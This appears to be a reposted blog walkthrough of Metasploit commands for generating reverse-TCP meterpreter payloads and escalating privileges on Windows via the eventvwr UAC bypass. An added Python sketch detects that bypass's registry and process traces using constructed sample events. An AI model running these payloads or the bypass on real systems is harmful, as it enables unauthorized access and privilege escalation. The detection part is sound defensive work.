When reposting, please cite the source: https://blog.csdn.net/l1028386804/article/details/86515785
1. Check the target host's operating system
a) x86 operating system
kali# msfvenom -p windows/meterpreter/reverse_tcp
b) x64 operating system
kali# msfvenom -p windows/x64/meterpreter/reverse_tcp
2. Establish a session with msf
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp # x64 target
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp # x86 target (set only the one that matches step 1)
3. Privilege escalation
msf exploit(handler) > search bypassuac // use bypassuac (bypass User Account Control)
msf exploit(handler) > use exploit/windows/local/bypassuac_eventvwr # worked on x64
msf exploit(handler) > set payload windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > show targets // list the targets; optional, choose according to the operating system
msf exploit(handler) > set target 1 # set the target to x64; 0: x86
msf exploit(handler) > exploit
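On the defending side, the bypassuac_eventvwr technique from step 3 is known to leave two traces: a per-user override of the mscfile open command in the registry, and eventvwr.exe starting a child process other than mmc.exe. The Python sketch below is an added example, not part of the original post; the function names are hypothetical and the events are constructed samples that use Sysmon field names (EventID 1 and 13).

```python
# Added example: flag telemetry consistent with the eventvwr.exe UAC bypass.
# Field names follow Sysmon (EventID 1 = process create, 13 = registry value set).
# Every event below is a constructed sample, not captured data.

HIJACK_KEY = "\\mscfile\\shell\\open\\command"  # compared in lower case


def classify(event):
    """Return a short finding string, or None if the event looks benign."""
    eid = event.get("EventID")
    if eid == 13:
        # Registry paths are case-insensitive; Sysmon appends the value name
        # (e.g. "\(Default)"), so test for containment rather than a suffix.
        target = event.get("TargetObject", "").lower()
        if target.startswith(("hku\\", "hkcu\\")) and HIJACK_KEY in target:
            return "registry: per-user mscfile handler set to %r" % event.get("Details")
    elif eid == 1:
        parent = event.get("ParentImage", "").lower()
        image = event.get("Image", "").lower()
        # eventvwr.exe normally launches only mmc.exe.
        if parent.endswith("\\eventvwr.exe") and not image.endswith("\\mmc.exe"):
            return "process: eventvwr.exe spawned %s" % event.get("Image")
    return None


def scan(events):
    """Return (index, finding) for every suspicious event, in input order."""
    findings = []
    for index, event in enumerate(events):
        finding = classify(event)
        if finding is not None:
            findings.append((index, finding))
    return findings


SAMPLE_EVENTS = [  # constructed
    {"EventID": 13, "Details": r"C:\Users\Public\sample.exe", "TargetObject":
     r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001_Classes\mscfile\shell\open\command\(Default)"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Windows\System32\mmc.exe"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\eventvwr.exe",
     "Image": r"C:\Users\Public\sample.exe"},
    {"EventID": 13, "Details": r"%SystemRoot%\system32\mmc.exe",
     "TargetObject": r"HKLM\SOFTWARE\Classes\mscfile\shell\open\command\(Default)"},
]

if __name__ == "__main__":
    for index, finding in scan(SAMPLE_EVENTS):
        print(index, finding)
```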